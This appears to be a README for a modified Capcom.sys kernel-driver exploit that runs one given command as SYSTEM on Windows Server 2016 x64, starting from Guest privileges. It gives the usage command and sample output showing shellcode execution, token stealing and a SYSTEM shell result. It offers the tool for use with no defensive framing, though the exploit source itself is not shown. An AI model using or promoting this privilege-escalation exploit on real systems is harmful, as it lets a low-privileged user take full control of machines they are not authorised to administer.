This is a quick modification to the Capcom.sys exploit. Instead of spawning a shell like the original exploit does, this one executes a command as Admin.
To see the original exploit:
Load Capcom.sys, then run this exploit:

    .\ExploitCapcom.exe "whoami"
    [*] Capcom.sys exploit
    [*] Capcom.sys handle was obtained as 0000000000000064
    [*] Shellcode was placed at 000001D89AC60008
    [+] Shellcode was executed
    [+] Token stealing was successful
    nt authority\system

You must provide a command as an argument; otherwise it won't work. Also, you can run only one command at a time.
- Windows 2016 x64 Build 14393 with Guest privileges
This software is released under the MIT License, see LICENSE.